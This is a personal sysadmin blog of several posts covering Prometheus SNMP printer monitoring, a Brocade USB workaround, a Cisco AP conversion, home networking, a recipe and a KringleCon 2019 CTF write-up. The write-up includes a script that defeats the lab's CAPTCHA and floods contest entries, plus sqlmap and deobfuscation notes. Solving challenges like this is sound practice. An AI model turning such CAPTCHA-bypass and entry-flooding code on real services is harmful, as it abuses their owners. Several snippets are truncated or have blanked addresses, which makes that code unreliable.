Prometheus and SNMP from a printer

The other week I finally got this thing working that I've been poking at every now and then when I had a few minutes free: send an alert before the toner runs out in a printer!

Way back I set up snmp_exporter to fetch metrics from switches. This worked very nicely. (In retrospect it works nicely because switches are the default type of device.)

But for printers we didn't get much useful data out, even though we use the vanilla upstream snmp.yml, which has printer stuff in it. When I did an snmpwalk I did manage, with some research, to find the correct OIDs to query to get the toner levels. So I knew the printer did publish the information I was looking for.

The answer? Select a module when sending the request to the exporter! I hadn't selected printer_mib, so it used if_mib, which only has interface statistics.

What would have helped? Not using the vanilla (large) snmp.yml and instead using a custom one that has only the data we want.
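For reference, here's a minimal sketch of what the Prometheus side looks like with the module selected. The host names and the exporter address are placeholders, and this follows the usual snmp_exporter relabeling pattern; the key part is `params: module`, without which the exporter falls back to if_mib:

```yaml
scrape_configs:
  - job_name: snmp_printers
    metrics_path: /snmp
    params:
      module: [printer_mib]   # without this, snmp_exporter defaults to if_mib
    static_configs:
      - targets:
          - printer1.example.com   # the printer, not the exporter
    relabel_configs:
      - source_labels: [__address__]
        target_label: __param_target
      - source_labels: [__param_target]
        target_label: instance
      - target_label: __address__
        replacement: snmp-exporter.example.com:9116   # where snmp_exporter runs
```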

Printers are no fun :/

Prometheus is!

Convert a string to integer in Kibana with painless

if (doc['bytes.keyword'].size() != 0) {
    return Integer.parseInt(doc['bytes.keyword'].value);
}
return 0;
This took me a while to figure out!

The above only works for integers (so no 1.1 or 2.22).

It works on ELK 7.10

I needed it because I'm using the %{COMBINEDAPACHELOG} GROK pattern.

That GROK pattern is built into logstash and just says %{NUMBER:bytes}, and NUMBER is (?:%{BASE10NUM})

There’s actually a way to specify in the grok pattern that it’s an integer:

%{NUMBER:field:integer}. There's an open issue from 2016 about this.

I guess what I should do is just make my own pattern with this fixed where I want it… I'd really rather not fiddle with templates or add logstash mutate rules..

Non Brocade Branded USB stick activation

Another submission courtesy of Eberhard.

Run anything here at your own risk. From what I can tell it should be fairly safe. Do make sure you run it on the switch itself. Pretty nice in case you don't want to shell out for a Brocade-branded USB stick to transfer firmware!


I found a description of how to format a USB stick so that it could be accessed by the Brocade OS.

In fact, after some investigation I noticed an error in this description that prevents access to a stick configured this way.

To make life easier I modified the /sbin/hotplug script by adding one line. Now any USB stick may be used for installation or backup purposes.

The modified hotplug script adds the VENDOR string to /etc/fabos/usbstorage.conf if the vendor is unknown. If you rerun the "usbstorage -e" command, the previously unknown vendor's stick is recognized by hotplug and the activation of access succeeds!

It might be annoying to do the activation of a stick twice, but this only has to be done when the vendor of the USB stick is new to your Brocade switch.

FabOS is capable of handling VFAT32-formatted sticks.

The stick needs 5 directories (1 and 4 children):

Here is the diff

# diff hotplug.orig hotplug

 >     echo "VENDOR $vendor" >> $USBCONFIG

The above output means: add the "echo …" line at line 62 of the hotplug script.

All of this was tested with FOS v7.4.2f.

Insert the stick in a switch and run this script as root:

#!/bin/bash -x
insmod /lib/modules/default/kernel/drivers/usb/core/usbcore.ko
insmod /lib/modules/default/kernel/drivers/usb/host/hcd-driver.ko
insmod /lib/modules/default/kernel/drivers/usb/storage/usb-storage.ko
sleep 10
lsmod | grep usb
/bin/mknod -m 660 /dev/sda b 8 0
/bin/mknod -m 660 /dev/sda1 b 8 1
/bin/mknod -m 660 /dev/sda2 b 8 2

Sometimes the above script fails; run it again until lsmod lists usb_storage and usbcore as loaded kernel modules.

Now I can mount an ext3-formatted USB stick:

# mkdir /usb_ext3

# mount -t ext3 /dev/sda1 /usb_ext3

# ls /usb_ext3/

bin/         dev/     fabos/   libexec@  sbin/           tftpboot/ var/
boot/        diag@    import/  mnt/      share@          tmp/
config/      etc/     initrd/  proc/     standby_sbin/   users/
core_files/  export/  lib/     root/     support_files/  usr/

# mkdir /usb_vfat

# mount -t vfat /dev/sda1 /usb_vfat

# ls /usb_vfat/
.Trash-1000/  brocade/  config/  firmware/  firmwarekey/  hda1.dmp* support/

I'll stop here for the moment, because now I need to figure out how u-boot starts an OS from a USB stick…

Brocade CF Replacement Hints

This post is based on a submission from Eberhard, a reader of this blog, probably primarily of the popular Brocade SAN upgrades post. Many thanks for this; hoping it will help someone out there!

The topic here is how to replace the embedded Compact Flash card if that breaks.

You can read about how to do that in the PDF below:

If your CF drives are exactly the same size (not in GB, but in blocks) as the one in the Brocade, then you could get away with dd'ing the whole /dev/sda, which would simplify the process a little.
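The dd route could be sketched like this. The device names are made-up examples (check your own with lsblk before touching anything), and the demo at the end copies plain files instead of devices so it is safe to run anywhere:

```shell
# On the real hardware (hypothetical device names!), first compare sizes in blocks:
#   blockdev --getsz /dev/sdX   # source CF
#   blockdev --getsz /dev/sdY   # replacement CF; must match exactly
# then clone:
#   dd if=/dev/sdX of=/dev/sdY bs=1M conv=fsync
# Safe demo of the same idea using files:
dd if=/dev/urandom of=/tmp/cf_src.img bs=1024 count=64 2>/dev/null
dd if=/tmp/cf_src.img of=/tmp/cf_dst.img bs=1024 2>/dev/null
cmp -s /tmp/cf_src.img /tmp/cf_dst.img && echo "clone verified"
```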

Again, many thanks for the contribution!

New Home Network Plan!

Changing apartment again so a pretty decent time to change the network at home.

Doing it a bit on the cheap this time around.

We'll get a DOCSIS cable connection. Fortunately I have a modem used to connect to the same ISP from a previous apartment. Unfortunately the modem was a bit shit: it used to reboot, or need a reboot, every now and then.

The plan is now to put the modem into bridge mode and move the brains into two other devices.

First device: a Raspberry Pi 3B with OpenWrt installed. It'll have an extra Realtek RTL8153 1Gbps USB NIC.

The internal 100Mbps NIC goes to the LAN and will run the DHCP server. The external one will have the WAN connection. The RPi 3B also has WiFi, but it's only 2.4GHz, so we'll only use that for local admin access.

The second device is a Cisco AP that I blogged about not too long ago. That one can do 5GHz :) It hasn't been used yet, but I set it up so I can just plug it into an L2 network with DHCP and it should just work.

Will also use an unmanaged switch to connect stuff on the LAN.

One nice thing about the current apartment is the Ethernet in all rooms. The new one might only have one cable TV/antenna port; hoping for more. I'd rather not have to use Ethernet over power, as there's also a media server to connect to the LAN or WiFi near the Chromecast. Sometimes it's nice to not throw everything away: thought I had thrown away the cable modem too, but turns out I hadn't. A new one is 180€ and used ones seem to go quite quickly on second-hand marketplaces.

3 months at IQM today!

And I’m on holiday :)

Wasn't really expecting to be able to go on holiday while working for a startup, but there's some coverage and the old IT admin is still around, so it's very nice to be able to take time off and not have to worry. I even get some more later in the summer. All those extra hours I managed to squeeze in by not commuting to work got me a few extra weeks of holiday :)

Got lots of things in the pipeline to think about though. Without going into much detail, they are important but quite some distance from what I've worked with so far: basically a whole ecosystem to get familiar with. Soon I'll have to decide if I want to do it the hacky way, learn the proper way, or try to outsource it. But what I want shouldn't come first; what makes business sense should.

So far I have enjoyed getting reacquainted with the ELK stack and acquainted with Prometheus for monitoring. No fancy queries yet, but so far it's looking quite OK.

Unsurprisingly I’ve also enjoyed doing some documentation work and keeping things patched :)

One month at IQM today!

Was reminded that today was exactly one calendar month since I joined IQM Finland

It's been a very hectic month, and mostly remote because of the pandemic. I have met a few people in person and video-chatted with a few more. We have these weekly lunch meetings that are a good way to see and hear people. I try to bring up a little bit of social, non-work stuff in the video meetings just to get to know people a little.

I’m really enjoying it and it’s been interesting to see how the company mindset makes such a difference to my work as a sysadmin/it specialist.

Recipe: Risotto


  • 2 pots
  • 1 pan
  • Butter
  • Onion
  • Risotto rice
  • Water
  • Stock cube
  • Dry apple cider
  • Parmeggiano
  • Raw sausages

Instructions:

Water and the stock cube into one pot.

Sausages into the pan, maybe 4/10 heat. Use a lid and turn the sausages often. Use a fork to poke a few holes in the sausages when they are almost done. 20 min? At 30 min, with the holes poked too early, the sausages came out a bit dry but still good.

Butter into the other pot, then the onion and the rice. 4 min.

Then add water to the risotto pot whenever it has run out. The rice is done when it's soft.

Finally add the sausages and the Parmeggiano


Yesterday was my last day at CSCfi

9 years were significant and meaningful to me.

We did a lot of cool things that as a very nice side benefit helped research, both in Finland and in other places!

I’ve been involved in some core projects, both for internal users and external ones. I was free to release code as open source. I have solved hard problems, gotten rid of manual work with automation and helped people grow.

I'm happy to have met great friends and colleagues at CSCfi. I've learned so much; many thanks for showing me how to work right, and that it's not all about 9-to-5 work.

It has been a rewarding experience. I like to think I’ve come quite some way from where I started. So long, @CSCfi, and thanks for (all the fish) lasting memories!

AIR-LAP1142N-E-K9 to autonomous Mode Adventure

Wifi and PoE injector


Some useful initial information

  • Reset is done by holding MODE and then powering off and on the device
  • Default enable password is Cisco
  • Serial on ttyUSB0 worked with a USB-to-RS232 adapter plus a serial-to-RJ45 adapter; my cheapo ebay USB-to-RJ45 did not work. The colors of the wires are different..
    • working: LL977744 CSA AWM and a "pl2303 converter" Prolific Technology Inc on ttyUSB0
  • Firmware c1140-k9w7-tar.153-3.JD17.tar found on twitter with checksum d96702caf75442f01359aa9a6cb70d19

While the AP is in non-autonomous mode you need to run a debug command to get into conf t: debug capwap console cli

To change it from using a controller to autonomous mode you need to load an autonomous firmware. The one I got had a firmware loaded that wanted to talk to a controller.

  • Looking at the serial log, the firmware on the AP indeed ended in "w8", which means it needs a WLC
  • tried to first set up a TFTP server, open firewalls, and reboot the access point while holding the mode button (you need to hold it for a long time, like 27s). It tried to fetch the image from tftp:// but it didn't work / timed out..

Hunt goes on:

These release notes got me a bit worried:

"Conversions from an 8.0 Wireless LAN Controller unified release AP image to the autonomous 15.3(3) k9w7 image will get aborted with a message 'AP image integrity check failed.' To overcome this, load any previous autonomous k9w7 image and then upgrade to the 15.3(3) JAB k9w7 images." The LWAPP version I had was 7.3.x, so the above did not apply. Another page talks about changing the listening address..

The secret sauce

  • set up a static IP on your linux computer; make sure to not just "ip addr add ip/24 dev eth0", because you might still have NetworkManager running DHCP that reverts those changes
  • set up a dhcpd that has a range or some such
  • set up a linux tftp.service. If you want "--verbose --address" added to tftp.service on CentOS 7, edit the file shown by systemctl cat tftp
    • Not sure if needed, but maybe it was useful
  • systemctl start tftp dhcpd
  • systemctl disable dhcpd tftp
  • make sure to let UDP (& TCP?) port 69 through the firewall
  • next is to connect the console and login to the AP and run some commands:
$ ena
# conf t
# debug capwap console cli
# archive download-sw /force-reload /overwrite tftp://
  • Before you disconnect the ethernet cable from the AP, stop and disable dhcpd and tftp so you don't leave a rogue DHCP server running in some office network.
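For reference, the dhcpd side of the steps above could look something like this; every address here is a made-up example and needs to match the static IP you configured:

```
# /etc/dhcp/dhcpd.conf -- minimal sketch, all addresses are examples
subnet netmask {
    range;
    option routers;
    next-server;   # the TFTP server (this machine)
}
```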

Configuring it

Easiest is probably to use the web UI on http://IP:80 to configure it.

Username/Password: Cisco/Cisco (see the ap1140aut_getstart.html getting started guide)

There’s the express setup and I used these settings:

  • Only configured the 5GHz
  • Set a short SSID and enabled broadcast beacon
  • WPA2-PSK key
  • Disabled universal admin
  • Set VLAN 5 and native VLAN

Other changes:

  • Enable the radio (no shutdown on the interface or in the web ui)
  • Create a new user/change default passwords of Cisco user to make it a little bit harder for things to pwn it
  • Set clock
  • Change the hostname and set a login banner
  • copy run start

One could enable HTTPS, but it used a too-weak key by default, so I just left it at HTTP. In any case, make sure to set the clock before enabling HTTPS.

Some extremely useful links

Previous post in this blog about my home network:

Quadra – Did You Play It?

In my youth I enjoyed LAN parties. One fun game we played was Quadra, a multiplayer tetris where by playing well you send more blocks to your opponents, making it very stressful :D Turns out it is open source and it's out there!

Does it still build?

CentOS 7.7:

$ sudo yum install git
$ git clone
$ sudo yum groupinstall "Development Tools" 
$ sudo yum install SDL2-devel boost-devel libpng-devel
$ cd quadra
$ autoreconf -i
$ ./configure
$ make


Does it run!?

$ QUADRADIR=. ./quadra

And I get a very nice window :)

Quadra in 2020! (Do note that it tries to talk to google and sourceforge for updates and so on; try ./configure --disable-version-check)

I could even launch one process to run a server, then another process, and connect to localhost :) So multiplayer must surely work!

It's a bit laggy; I recall it being very snappy, because I was da bomb at this game :)

I blame this on possibly having missed some dependency, so it fell back to some slower code path, and/or maybe the graphics card in this laptop is not good (maybe it's too new? It's a Skylake GT2 HD Graphics 520).

Kringlecon 2019 Write-Up

The challenges!

'Tis the season to be jolly! Been doing a few CTFs lately. It started with the Disobey 2020 puzzle to get the hacker ticket. Then there was OverTheWire's 2019 advent CTF. And finally this one, the SANS Holiday Hack Challenge: KringleCon 2019. As of writing I got what felt like quite far in the Disobey one, but got thoroughly stuck on the second keyhole. For OTW I found a similar but slightly easier challenge on the 6th of December, but did not manage to get the key. Most of the others, except the first and challenge zero, I didn't really have time for. So with not so much progress it was very nice to take a step back and try out KringleCon, where I managed to get a bit further!

A short tl;dr of the methods/answers to the objectives:
  1. talk to santa: go up up up and click click click :)
  2. find turtle doves: mm, they were in the union
  3. unredact: at the time I was on a ski holiday, so I used termux on my phone and installed pdf2txt there to unredact it :) Fun to use the phone :)
  4. windows event log outcome: clicked around until I found something that looked suspicious. I think it was a filename that looked sensitive.
  5. windows event log technique: parsed these with python to print command_line and process_name
  6. network log - compromised system: got it to print IPs with python
  7. splunk: followed the chat; quite a nice way to learn the tool. Finding the correct file in the archive was a bit tricky, had to read through the chats carefully several times :)
  8. steam tunnels: the physical key! Spent quite some time wandering around trying to find the key. Eventually gave up. Then tried again after making it into the sleigh shop, and hey, there it was :) Couldn't really get the decoder to line up, so used pixels mostly; took 5 tries or so :)
  9. captcha: super fun, most fun. Hadn't tensorflowed before. Followed the youtube and github repo, basically. Used an 80-core 365GB cloud instance from $dayjob for a short while, as the 2-core 2GB RAM instance I started with was too small ;)
  10. scraps: hadn't used sqlmap before either. First mapped out the page manually to find the forms. Then learnt about sqlmap --crawl :) The money shot for me was --eval="import requests;token=requests.get('').text"
  11. elfscrow: So. Hard. Learnt a bit more assembly reading. Used IDA this time instead of my previous attempts with radare2. Wonder when I'll get better at these :)
  12. sleigh shop door: also very fun to unlock those locks! Did not crack it in under 5s, but did beat the slower (three-minute) target.
  13. filter out poisoned: ugh, this one was tedious. Actually this one and the previous I did spend some time trying to learn properly, but in the end found a write-up that was published too early (and later removed, but still in google cache..)

Getting on with it!

  • The pdf deobfuscation I could do on my phone in termux, just a pkg install pdftotext :)
  • The nyancat one took a bit more time than I should admit, primarily because I forgot how sudo works and what sudo -u does..
  • For the frosty keypad I got to write a small python script (the hint numbers are also on a wall somewhere :)
import random

#numbers = [ 1, 3, 7 ]

results = []

length = 4
digits = 1337

# from
def is_prime_number(x):
  if x >= 2:
    for y in range(2,x):
      if not ( x % y ):
        return False
  else:
    return False
  return True

# from
while len(results) < 1000:
     for digit in range(1):
       digits = ''.join(str(random.randint(0, 9)) for i in range(length))
       if "3" in digits and "1" in digits and "7" in digits and not "0" in digits and not "2" in digits and not "4" in digits and not "5" in digits and not "6" in digits and not "8" in digits and not "9" in digits:
         if digits not in results:
           if is_prime_number(int(digits)):
             results.append(digits)
             print(digits)

You'll need to hit CTRL+C when it stops finding new solutions. It's not the fastest, has unused bits, and I don't know why it has the for digit in range(1) bit.
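For what it's worth, the same search can be done deterministically with itertools instead of random sampling. This is just my sketch of the idea, not the script used above, and it doesn't give away the actual keypad answer:

```python
# Deterministic version of the search above: enumerate every 4-digit code
# built only from the digits 1, 3 and 7, require all three to appear,
# and keep the primes.
from itertools import product

def is_prime(x):
    if x < 2:
        return False
    for y in range(2, int(x ** 0.5) + 1):
        if x % y == 0:
            return False
    return True

codes = []
for combo in product("137", repeat=4):
    code = "".join(combo)
    if {"1", "3", "7"} <= set(code) and is_prime(int(code)):
        codes.append(code)

print(codes)  # 1373, for example, is in the list
```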

On to the next challenge!:

  • The windows event log file I just opened on a Windows machine and looked around
  • The sysmon file I printed some interesting keys in the json strings with a tiny python script
import json

with open('sysmon-data.json') as json_file:
    data = json.load(json_file)
    for p in data:
        # print the interesting keys (loop body reconstructed; key names
        # are the ones mentioned above)
        print(p.get('command_line'), p.get('process_name'))
  • For the splunk one I basically just followed the chats. A bit tricky, to be fair! By luck I had already downloaded the correct file from the Archive, but did not look at it deeply enough..
  • For the Graylog one I just clicked around. I liked the "quick table" feature, which got me some of the answers fairly quickly without having to write narrower searches. Quite a few steps were needed, so it took some time. It was nice to get to compare Graylog and Splunk; I've only used a vanilla ELK stack before, and last at version 5. With that in mind, discovering the data was a bit easier for me in Graylog.
  • Trail of tears I just beat the game on easy :) (/edit: turns out one can solve this on hard)

Next one was a powershell one! The laser adjuster :P

Finally got to get a bit familiar with powershell. I’m a lurker on r/sysadmin and very often there are powershell oneliners on display there. This was quite a fun one to be honest :) Kind of like using python directly in the shell.

Some things I learnt were:

  • Get-History shows stuff! But no .bash_history so I actually wonder where this history is from? It’s not in .local/powershell…
  • Trying to bruteforce this one manually was very slow so I gave that up fairly quickly.
  • I tried to find a way to read the python code that powered the website. Only found the process id, but no open files visible. Would need to get root for that I suppose..
  • figured out how to -X POST a body for the gases!
  • hints in chat suggested powering off and on
  • $env has things!
  • Format-Hex -Path ./archive | Select-Object -First 1
    • magic number 50 4B 03 == zip
    • expand-archive
    • chmod +x
    • get-content riddle # Gives an md5sum
  • md5sum hunter
$files = Get-ChildItem -Path /home/elf/depths -Recurse -File
Foreach ($file in $files) {
     if ((Get-FileHash -Path $file.FullName -Algorithm MD5).Hash | Select-String 25520151A320B5B0D21561F92C8F6224) {
         # print the matching file (loop body reconstructed)
         $file.FullName
     }
}

Could have found this with a recursive grep for temperature -e angle -e param..
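That recursive-grep alternative would look like this; /home/elf/depths is the path from the challenge, and the runnable demo below uses a temp directory instead so it works anywhere:

```shell
# On the challenge box it would be:
#   grep -r -l -e temperature -e angle -e param /home/elf/depths
# Safe demo of the same flags:
mkdir -p /tmp/depths/sub
echo "angle = 65.5" > /tmp/depths/sub/config.txt
echo "nothing here" > /tmp/depths/other.txt
grep -r -l -e temperature -e angle -e param /tmp/depths
# prints /tmp/depths/sub/config.txt
```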

The solution:

(Invoke-WebRequest -Uri http://localhost:1225/api/off).RawContent
$correct_gases_postbody = @{O='6';H='7';He='3';N='4';Ne='22';Ar='11';Xe='10';F='20';Kr='8';Rn='9'}
(Invoke-WebRequest -Uri http://localhost:1225/api/gas -Method POST -Body $correct_gases_postbody).RawContent
(Invoke-WebRequest -Uri http://localhost:1225/api/on).RawContent
(Invoke-WebRequest -Uri http://localhost:1225/api/output).RawContent


  • Iptables / smart bracelet one: I think I was close to or did complete this, but Kent did not agree? Went back and tried it again slowly by first writing the commands in a text file
sudo iptables -P FORWARD DROP

sudo iptables -P INPUT DROP

sudo iptables -P OUTPUT DROP

# should be in two lines? as the iptables output orders them related,established..
sudo iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
sudo iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

sudo iptables -A INPUT -p tcp --dport 22 -s -j ACCEPT

sudo iptables -A INPUT -p tcp --dport 21 -s -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 80 -s -j ACCEPT

sudo iptables -A OUTPUT -p tcp --dport 80 -d -j ACCEPT

sudo iptables -A INPUT -i lo -j ACCEPT

Kent TinselTooth: Great, you hardened my IOT Smart Braces firewall!
  • Sled Route API: got the login. Next, to figure out which requests were bad and how to fill in 100 on the web page… Maybe one can figure out the firewall API? Hmm, played a bit with elasticsearch.. then gave up.. in the meantime went ahead to:

Sleigh Shop Door

  • Ah, this is fun! While poking through the web source after fixing the smart bracelet I found the URL to the sleigh shop in the source. It had a bunch of locks.
Haha! If you reload the page, the codes needed are different!

1. B46DU583 - top of the console
2. XNUBLBKW - see it by looking in ctrl p (print preview)
3. unknown, fetched but never shown..

Ha, this was funny: clicking around the tabs I found a javascript that needed some deobfuscation, and in it found var _0x1e21.

So I ran that in the console with the values found in if statements and eventually:


 and it printed a bunch of things, and element 34 had an image:

VM3008:1 images/73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12.png

which was an image with the combination to the 3rd lock

4. ILMJRNTP found in local storage
5. CJ4WCMG4 - <title></title>

6. from the card.. Y3WJVE01 sticker - but if one removes the hologram CSS the letters are in a different order: JYV0EW13.
7. G7LDS1LS - font family

8. VERONICA - In the event that the .eggs go bad, you must figure out who will be sad.
From client.js, deobfuscated to make it a bit readable, and just read through

9. chakra in the css file
10. component.swab, a bunch of things around lock c10

finding .locks > li > .lock.c10 .cover

one can remove the cover

on the board there's a code: KD29XJ37

but all the other codes have been per session..

console.log says "Missing macaroni"

In the code there's:

 console["log"]("Well done! Here's the password:");
 console[_0x1e21("0x45")]("%c" + args["reward"], _0x1e21("0x46"));

In the console there's this whenever one presses the unlock:

73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1 Error: Missing macaroni!
    at HTMLButtonElement.<anonymous> (73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1)
(anonymous) @ 73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1

there's a bunch of "<div class="component gnome, mac, swab" with data-codes: XJ0 A33 J39

Dragging the components further down changed the error and printed this in the console:

Well done! Here's the password:
73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1 The Tooth Fairy
73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1 You opened the chest in 6291.088 seconds
73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1 Well done! Do you have what it takes to Crack the Crate in under three minutes?
73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1 Feel free to use this handy image to share your score!
  • Doing the combination locks in under 3 minutes I think can be done manually.
    • But a nice thing to do would be to enter a bunch of commands into the browser console to help do some of it programmatically. Maybe one can enter javascript to also fill the numbers into the locks??
Some are maybe fixed??:

However, after doing that as fast as I could manually:

You opened the chest in 150.151 seconds
621c8819-1d6a-4d77-bd41-5214a6beccf5:1 Very impressive!! But can you Crack the Crate in less than five seconds?
621c8819-1d6a-4d77-bd41-5214a6beccf5:1 Feel free to use this handy image to share your score!
  • For that I’m thinking burp suite to automate the browser is needed?
  • When inside the Sled Shop there was a request to get the IP for the connection with longest duration:
head conn.log | jq -c '.["id.orig_h"], .duration'
cat conn.log | jq -s -c 'sort_by(.duration)' > /tmp/sorted
cat /tmp/sorted # ... took forever, then just looked at the bottom:
4-18T21:27:45.402479Z","uid":"CmYAZn10sInxVD5WWd","id.orig_h":"","id.orig_p":8,"id.resp_h":"","id.resp_p":0,"proto":"icmp","duration":1019365.337758,"orig_bytes":30781920,"resp_bytes":30382240,"conn_state":"OTH","missed_bytes":0,"orig_pkts":961935,"orig_ip_bytes":57716100,"resp_pkts":949445,"resp_ip_bytes":56966700}]
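Since slurping the whole log with jq -s was slow, a streaming pass that only keeps the current maximum would avoid holding the file in memory. A sketch with made-up sample records (the field names match the conn.log entry above):

```python
import io
import json

# Two fake conn.log lines; real entries have many more fields.
sample_log = io.StringIO(
    '{"id.orig_h": "10.0.0.1", "duration": 5.0}\n'
    '{"id.orig_h": "10.0.0.2", "duration": 1019365.337758}\n'
)

longest = None
for line in sample_log:
    rec = json.loads(line)
    # keep only the record with the largest duration seen so far
    if longest is None or rec.get("duration", 0) > longest.get("duration", 0):
        longest = rec

print(longest["id.orig_h"])  # -> 10.0.0.2
```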

Finishing each challenge gives tips for other challenges. There was a hint for the Sled Route API suggesting jq. And another that if you beat the trail game on hard there are more hints? Also beating the lock game in under 3 minutes is another hint, I think..

  • Next one I managed was the key-bitting one, to get into the Steam Tunnels! There was a good talk on this topic with a link to and then I just used that and tried maybe 5 keys before finding the right one. GIMP is not my specialty, but the decoders helped a bit. The image of the key was not discoverable until one got into the Sleigh Shop.

Image AI

And then we get to the CAPTCHA + tensorflow madness! This was real fun, haven’t had to do much with tensorflow before. Did not have to read much at all about tensorflow to get this going, could basically just glue together the provided python scripts.

Another very good kringlecon talk on this topic led to a github repo. Some other code and training images were found as soon as one got far enough into the Steam Tunnels. After not too much googling I managed to get the python script to store the images from the CAPTEHA in a directory and then run the predict tensorflow script from the github repo against it. It was however too slow. Fortunately I had access to a machine with lots of cores, so moving all the data there and re-running the python got it working for me. 2 oversubscribed cores and 2GB RAM was too little; 80 dedicated single-server skylake cores and 356GB RAM completed it much faster. There were messages about the tensorflow from pip not having been compiled with all the optimizations enabled. I suppose I could also have tried this with a GPU :) And the python:

#!/usr/bin/env python3
# CAPTEHA API - Made by Krampus Hollyfeld
import requests
import json
import sys
import os
import shutil
import base64

os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
import numpy as np
import threading
import queue
import time

def load_labels(label_file):
    label = []
    proto_as_ascii_lines = tf.gfile.GFile(label_file).readlines()
    for l in proto_as_ascii_lines:
        label.append(l.rstrip())
    return label

def predict_image(q, sess, graph, image_bytes, img_full_path, labels, input_operation, output_operation):
    image = read_tensor_from_image_bytes(image_bytes)
    results =[0], {
        input_operation.outputs[0]: image
    })
    results = np.squeeze(results)
    prediction = results.argsort()[-5:][::-1][0]
    q.put( {'img_full_path':img_full_path, 'prediction':labels[prediction].title(), 'percent':results[prediction]} )

def load_graph(model_file):
    graph = tf.Graph()
    graph_def = tf.GraphDef()
    with open(model_file, "rb") as f:
        graph_def.ParseFromString(
    with graph.as_default():
        tf.import_graph_def(graph_def)
    return graph

def read_tensor_from_image_bytes(imagebytes, input_height=299, input_width=299, input_mean=0, input_std=255):
    image_reader = tf.image.decode_png( imagebytes, channels=3, name="png_reader")
    float_caster = tf.cast(image_reader, tf.float32)
    dims_expander = tf.expand_dims(float_caster, 0)
    resized = tf.image.resize_bilinear(dims_expander, [input_height, input_width])
    normalized = tf.divide(tf.subtract(resized, [input_mean]), [input_std])
    sess = tf.compat.v1.Session()
    result =
    return result

# above is from because python and import meh


def main():
    yourREALemailAddress = ""

    # Creating a session to handle cookies
    s = requests.Session()
    url = ""

    json_resp = json.loads(s.get("{}api/capteha/request".format(url)).text)
    b64_images = json_resp['images']                    # A list of dictionaries eaching containing the keys 'base64' and 'uuid'
    challenge_image_type = json_resp['select_type'].split(',')     # The Image types the CAPTEHA Challenge is looking for.
    challenge_image_types = [challenge_image_type[0].strip(), challenge_image_type[1].strip(), challenge_image_type[2].replace(' and ','').strip()] # cleaning and formatting

    # 0 wipe unknown_images dir
    # why wipe it tho?
    # 1 write b64 to unknown_images dir

    imgcnt = 0
    for image in b64_images:
        imgcnt = imgcnt + 1
        content = image['base64']
        uuid = image['uuid']

        try:
            filename = "unknown_images/%s" % uuid
            with open(filename, "wb") as f:
                f.write(base64.b64decode(content))
        except Exception as e:
            print(e)
    #    if imgcnt > 10:
     #       break
    # 2 run the predict against it
    #  python3 would have been fun instead we copy pasta
    # talks about mobilenet and speed optimizations..

    # Loading the Trained Machine Learning Model created from running on the training_images directory
    graph = load_graph('/tmp/retrain_tmp/output_graph.pb')
    labels = load_labels("/tmp/retrain_tmp/output_labels.txt")

    # Load up our session
    input_operation = graph.get_operation_by_name("import/Placeholder")
    output_operation = graph.get_operation_by_name("import/final_result")
    sess = tf.compat.v1.Session(graph=graph)

    # Can use queues and threading to speed up the processing
    q = queue.Queue()
    unknown_images_dir = 'unknown_images'
    unknown_images = os.listdir(unknown_images_dir)

    #Going to iterate over each of our images.
    for image in unknown_images:
        img_full_path = '{}/{}'.format(unknown_images_dir, image)

        print('Processing Image {}'.format(img_full_path))
        # We don't want to process too many images at once. 10 threads max
        while len(threading.enumerate()) > 10:
            time.sleep(0.0001)

        #predict_image function is expecting png image bytes so we read image as 'rb' to get a bytes object
        image_bytes = open(img_full_path,'rb').read()
        threading.Thread(target=predict_image, args=(q, sess, graph, image_bytes, img_full_path, labels, input_operation, output_operation)).start()

    print('Waiting For Threads to Finish...')
    while q.qsize() < len(unknown_images):
        time.sleep(0.001)

    #getting a list of all threads returned results
    prediction_results = [q.get() for x in range(q.qsize())]

    #do something with our results... Like print them to the screen.

    # 3 get a list of the uuids for each type
    good_images = []
    for prediction in prediction_results:
        print('TensorFlow Predicted {img_full_path} is a {prediction} with {percent:.2%} Accuracy'.format(**prediction))
        if prediction['prediction'] in challenge_image_types:
            good_images.append(prediction['img_full_path'].split('/')[-1])
    # TensorFlow Predicted unknown_images/dc646068-e584-11e9-97c1-309c23aaf0ac is a Santa Hats with 99.86% Accuracy

    # 4 make a new b64_images csv list with the uuids
    good_images_csv = ','.join(good_images)


    # This should be JUST a csv list of the image uuids the ML predicted to match the challenge_image_types.
    #final_answer = ','.join( [ img['uuid'] for img in b64_images ] )
    final_answer = good_images_csv

    json_resp = json.loads(requests.post("{}api/capteha/submit".format(url), data={'answer':final_answer}).text)
    if not json_resp['request']:
        # If it fails just run again. ML might get one wrong occasionally
        print('--------------------\nOur ML Guess:\n--------------------\n{}'.format(final_answer))
        print('--------------------\nServer Response:\n--------------------\n{}'.format(json_resp['data']))
        sys.exit(1)  # assumes `sys` is imported at the top; rerunning usually fixes a single misclassification

    print('CAPTEHA Solved!')
    # If we get to here, we are successful and can submit a bunch of entries till we win
    userinfo = {
        'name':'Krampus Hollyfeld',
        'email':yourREALemailAddress,
        'about':"Cause they're so flippin yummy!",
    }
    # If we win the once-per minute drawing, it will tell us we were emailed.
    # Should be no more than 200 times before we win. If more, somethings wrong.
    entry_response = ''
    entry_count = 1
    while yourREALemailAddress not in entry_response and entry_count < 200:
        print('Submitting lots of entries until we win the contest! Entry #{}'.format(entry_count))
        entry_response = requests.post("{}api/entry".format(url), data=userinfo).text
        entry_count += 1

if __name__ == "__main__":
    main()
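For what it's worth, the throttle-and-queue pattern the script relies on boils down to a small self-contained sketch (`work()` here is just a stand-in for `predict_image`, and the thread cap of 10 mirrors the script above):

```python
import queue
import threading
import time

def work(q, item):
    # stand-in for the predict_image call in the script above
    q.put(item * 2)

q = queue.Queue()
items = list(range(20))
for item in items:
    # throttle: don't let more than ~10 threads run at once
    while threading.active_count() > 10:
        time.sleep(0.01)
    threading.Thread(target=work, args=(q, item)).start()

# wait until every worker has reported a result
while q.qsize() < len(items):
    time.sleep(0.01)

results = sorted(q.get() for _ in range(q.qsize()))
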